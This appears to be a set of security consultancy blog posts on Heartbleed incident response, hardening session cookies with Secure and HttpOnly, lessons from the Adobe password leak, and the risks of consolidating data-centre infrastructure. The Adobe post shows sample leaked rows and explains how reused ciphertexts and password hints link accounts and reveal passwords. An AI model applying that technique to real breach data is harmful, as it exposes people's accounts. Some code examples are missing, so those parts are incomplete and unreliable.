heartbleedTo give you some context, I’m writing this blog in the days immediately following the Heartbleed event. I’m not going to comment on the event itself, as it has been done to death elsewhere, but I am going to focus on the reaction of the affected organisations.

Events like this, whilst rare, cannot be avoided entirely by any organisation that uses computers attached to the Internet. Software has flaws. Some flaws will be catastrophic. It’s a given. However, knowing this, you can prepare for the worst.

Firstly, many organisations had no idea what their attack surface was. Sure, it’s fairly trivial to point at the corporate web site. But many simply weren’t aware that there was a vulnerable SSL component in their other internet-facing applications, like their email servers. Understanding your attack surface simply has to be the first-step of protecting it. Otherwise, how can you protect that which you are not aware of?

Secondly, whatever incident response process they had just seemed to crumble. The flaw itself, whilst devastating, was thankfully easy to patch or otherwise mitigate. Then after that, there was simply a requirement to regenerate the certificates and finally force any authentication credentials to be expired and changed. It was clear that many high-profile organisations had taken no action long after the vulnerability was being actively exploited in the wild. Being objective, at this point, any services that were deemed to hold confidential data should have been simply taken offline to protect the brand. Decisions like this need to be pre-made by executives, and solid processes need to be established in advance, so that they can be carried out swiftly by the staff that administer the systems.

The reality is that this isn’t going to be a unique event. There will inevitably be others to come.

If your organisation does not understand your attack-surface and does not have a comprehensive incident response process already in place, then now is the time to act. You may be shutting the door behind this particular horse, but rest assured that there are plenty of other horses that you can still protect.

ImageComfort Eating for Web Applications

Cookies were devised to enable websites and applications to store small amounts of information in the browser. This enables the otherwise ‘stateless’ HTTP protocol used by browsers to be augmented to let the site enhance the user experience; for example,  remembering who the user was and what they were doing to tailor the content they will receive.

While there are potentially a vast number of uses for cookies, both benign and nefarious, an exceptionally common use is the storage and transmission of session data, enabling web-applications to provide a full experience for users. Session data provided via cookies allows applications to support continuous authentication, and subsequently access content and functionality without having to re-authenticate every-time they try and access a different piece of content or a feature; which would be necessary if the server had no way of reliably keeping track of requests received from the users browser.

The value allocated to the user within the cookie can include the difference in the privileges and accessibility rights accorded to an authenticated administrative user apposed to a standard user such as within a banking application. The value indicates the access rights, based on the stateful sessions. Staying within the realm of banking applications; it is important that the privileges accorded to the user do not become corrupted. It is equally important that the privileges of two standard users’ do not cross. In either situation, corruption of the relevant privileges could inevitably result in financial loss to both the bank and the end users.

It is equally important to remember that any service with an authentication system is by definition trying to keep some sort of information secure. Any application with user data or information will generally use cookies to identify users after they have authenticated. Once the application has identified and verified the user, the session token issued in the cookie is often the ONLY information that separates one authenticated user from another, or from a malicious hacker.

Once their ID and authentication credentials have been entered, whether by email, password, or a full multi-factor strong authentication system, the cookie generated must be protected if the user is to be protected.

Cookie Monsters, Nom Nom

Now is when we should switch our thinking to that of someone out to cause trouble! That cookie is all that stands between you and access to your targets services and data.

There are a handful of ways the token can be compromised by an attacker; essentially they can either steal the cookie after the user has authenticated, or force the user to use a token they are already aware of.  The latter involves implementation issues that are outside the scope of this article, but watch this space.

The former, stealing the user’s cookie, involves either snooping on their session to grab it ‘on the wire’, or tricking the user, their browser or the application into handing the cookie over.

By far the most common way to gain access to a session cookie is via a cross site scripting (XSS) vulnerability.

In the example below the cookie is displayed on screen, in reality it could be pushed  to a remote site by an embedded script and then utilised by a malicious user, as seen in the Apache.org XSS Compromise in 2010 [1].


A session token obtained in this manner could be used to impersonate the user from whom it was stolen. If there are no further security measures in place the token can be used to access the active session, gaining full access to the user functionality.

Another way cookies may be exposed is by an attacker sitting in a strategic location on the network and snooping on network traffic to grab the all important tokens.  This has commonly occurred in shared network environments providing free WiFi access, like the ubiquitous coffee shops and fast food joints we often work in during lunch.  The attacker sits on those networks (or sets up their own fake equivalent), monitoring the network activity and poaching the valuable sessions.  This has played no small part in the massive migration of online services from unencrypted HTTP to SSL wrapped HTTPS sites to try and stem the flow of drive-by account hijacks.

Defending the Cookie Jar – Set – Cookie Directives

Issues with cookie management usually arise with the directives; the problems aren’t new and the smart folk that devise the standards that underpin online communications try to provide extra mechanisms to defend ourselves.  Two possible directives can be employed to prevent aforementioned cross site scripting and similar attacks; the ‘Secure’ directive and the ‘HttpOnly’ directive.

The former ‘Secure’ directive directs the browser to send the cookies ‘securely’.  Sadly this is a rather informal definition, but in most cases it prevents cookies being sent over unencrypted channels. The development of the application should hopefully have followed some basic security standards; ideally access to a login process and protected (authenticated) pages, if not, the entire application should be stipulated to occur over HTTPS. There is no reason to send a cookie over unencrypted HTTP that could contain sensitive information, which would then be susceptible to network sniffing attacks.

          Example of a java session ID cookie with the ‘Secure’ directive:

          Set-Cookie: jsessionid=AS348AF929FK219CKA9FK3B79870H; Secure;

Similarly, the latter, ‘HTTP Only’ directive instructs the browser to only pass the cookie back to the server through its default mechanism; the ‘Cookie:’ HTTP header.  The key objective of this directive is to prevent access to the cookie by script executing in the browser.  The intent is that the token set by the server should still be passed back with every request, enabling the server to use it to track the session, but that neither the browser nor any other part of the communication chain should be able to read or modify it.

If it is not present in the Set-Cookie header (command), sent by the server, the cookie can be read by client side JavaScript as shown in the example above. Should a XSS vulnerability be present on the site in question, the cookie and subsequently the session data of the user could be captured and utilised by a malicious user.

Unless the web application in use requires client-side scripts to read or edit the cookie value, there is almost no reason not to have the ‘HttpOnly’ directive present.

          Example of a java session ID cookie with the ‘HttpOnly’ directive:

          Set-Cookie: jsessionid=AS348AF929FK219CKA9FK3B79870H; HttpOnly;

These cookie directives can of course be used in unison:

          Example of a java session ID cookie with the ‘HttpOnly’ and ‘Secure’ directives:

          Set-Cookie: jsessionid=AS348AF929FK219CKA9FK3B79870H; HttpOnly; Secure;

Failing to implement these simple directives in your applications greatly increases the possibility of session based attacks.

Going on a Cookie Diet: Implementing Directives

For more information refer to the following guide on implementing these directives in some of the more common web authoring languages.

‘Secure’ Directive:

Java (Servlet 3.0 (Java EE 6)):

A standard method was introduced to manage session cookies in Java’s web.xml:







The ‘Secure’ directive for PHP session cookies is set within the session_set_cookie_params function:

void session_set_cookie_params ( int $lifetime [, string $path [, string $domain [, bool $secure = false [, bool $httponly = false ]]]] )


Under .NET you can set the cookie directives within the web.config file in the system.web/httpCookies element:

<httpCookies requireSSL=”true” ..>

‘HTTP Only’ Directive:

Java (Servlet 3.0 (Java EE 6)):

A standard method was introduced to manage session cookies in java’s web.xml:







As with the ‘Secure’ directive, ‘HttpOnly’ is set within the session_set_cookie_params function:

void session_set_cookie_params ( int $lifetime [, string $path [, string $domain [, bool $secure = false [, bool $httponly = false ]]]] )


Under .NET you can set the cookie directives within the web.config file in the system.web/httpCookies element:

<httpCookies httpOnlyCookies=”true” …>

By Chris McCall
Image by Michelle O’Connell

strategy-114-passwords-pop_757At the beginning of October, Adobe reported a data breach that affected around 3 million customers [1]. In the following weeks, the number rose significantly, but this was just the tip of the iceberg. At the beginning of November a huge dump of the data was published online, containing an eye watering 150 million entries.

Various organizations, individuals and companies have analysed this data and have reached the same conclusions: firstly, Adobe’s choice of encryption was extremely poor and secondly, the passwords used by the users were shocking. See the original research by Jeremi Gosney[2], and an excellent article by Paul Ducklin for more information[3].

While most researchers were focusing on cracking the encryption key or criticising Adobe for the poor encryption selection, Corsaire initially did further analysis, focusing on extracting information to help our clients understand the implications of the leak and the lessons that can be learnt from this leak.. We have now decided to publish this advice more widely in the infosec community.

1.1     Weak Password Choice

Looking at Jeremi Gosney’s top 100 list, it is obvious that users are using very weak and simple passwords. While this is no real surprise, the worrying aspect is that many of these weak passwords are associated with corporate email addresses. For example, one global security company is using the generic password ‘123456’ for the account with the email address format of company@company.com


1.2     Password Reuse

Examination of the data reveals users are reusing the same password across multiple accounts, both corporate and personal. For example:

67436532-|–|-jbloggs@company.co.uk-|-VdcYhakfnPioxG6CatHBw==-|-your wife|–

a2342312-|–|-purchasing@company.co.uk-|- VdcYhakfnPioxG6CatHBw==-|-wife|–

72349517-|–|-jbloggs@hotmail.co.uk-|- VdcYhakfnPioxG6CatHBw==-|-wife|–

1.3     Related Accounts

Another piece of information that can be obtained from the reuse of passwords is the ability to link related accounts. In the example below you can track the employment history of J. Bloggs based on his password reuse.



23552666-|–|-j.bloggs@getfit.com -|-nSFKSJFaKERjfsxG6CatHBw==-|-|–


Of course, this will be difficult to achieve if the user has chosen a common password.

1.4     Password Hints

As the encryption key is still not publically known, the encrypted passwords cannot be reversed to yield the plaintext password. Unfortunately, the presence of unencrypted password hints supplied by the users allows us to make a very confident guess of the password. A single hint is often not enough information to allow a confident guess, but 10 or more hints for the same password makes the process considerably easier.

In the example below, the encrypted password is:


This is used in 25 different accounts. The associated password hints are:

Favourite element



Tl u/c

The usual metal


The rock


Seeing all these hints together allows us to make an educated guess that the password is probably ‘Thallium’.

1.5     Recommendations

The main points to take on board from this data leak, (after you have reset all your Adobe account passwords), is that users are the weakest security link in your company. While it is easy to implement and enforce a password policy within the internal corporate environment (via group policies, for example), it’s a very different situation online. You have no control over any particular individuals’ password strength if the online service/site does not enforce it.

This is where user education is vital. Educating your employees in password management best practices is a must and this should be done on a regular basis. Companies must ensure all users not only know and understand the current password policy, but the implications of using weak passwords or reusing passwords between corporate and personal accounts, especially online. In addition to education, providing your users with the ability to generate suitable passwords and store them securely will help (for example, unique password generators and password safe software).

If this has made you nervous and you would like us to examine the leaked data for any accounts related to your company, just get in touch!

Samantha Fielden, Head of Client Management
Artwork by Michael Gillette


Russian Dolls

As security professionals, one thing that we see repeatedly is the conflict between securing an organisation’s data assets and the cost of doing so. It’s a legitimate business conflict too. Whilst the recession is still fresh in everyone’s memory, saving money is always going to be a hot topic.

There can be significant economies of scale by consolidating data centre equipment. Folding all the hardware platforms into a single virtual server farm should slim the rack real-estate, whilst simultaneously reducing the need for power and air-conditioning. Likewise, merging the storage into a single, high-availability Storage Area Network (SAN) can increase reliability and reduce the overall cost of ownership. Then there is all that pesky networking equipment, like routers and switches; surely it would be cheaper to replace it all with a large multi-blade chassis?

However, the problem with too much consolidation is that sooner or later someone will be tempted to merge several clumps of applications and data (security domains) that have conflicting security requirements to save a few pennies. For example, sensitive financial systems that are only accessed by authorised users, and publicly accessible, brochure websites that anyone can use.

Two concepts you will hear security people talk about constantly are a “layered approach” and “compartmentalisation”. When they talk about a layered approach, they are referring to having multiple sets of security controls; so that if one fails, an attacker does not get complete access to the data. Compartmentalisation in turn refers to deliberately separating systems into discrete chunks, so that a breach in one area should remain isolated. Consolidation often negates these controls and approaches, making them irrelevant.

One might ask, why would this be a problem?

In a heavily consolidated environment it becomes much more straightforward for an attacker to use the common platform as a route to move between systems. Something as simple as a configuration mistake on a consolidated MPLS router, that routes both internal and external circuits, could allow access to your sensitive data. Or an attacker could use a consolidated SAN fabric with both internal and DMZ servers attached to bypass network firewalls. VM clusters that host both Internet-accessible and internal servers are also made vulnerable by consolidation. In the event of one server being compromised, then the VM platform itself may be attacked directly, allowing all servers hosted on it to be accessed.

Don’t get me wrong; consolidation can be a good thing when it is done well. The savings are very real. However, before you go ahead and commit to a consolidation plan proposed by your integration vendor, run it past your security team to make sure that you’re not making savings that will be made pointless after you’ve paid for a costly PR debacle.

Martin O’Neal

Photo: Lachlan Fearnley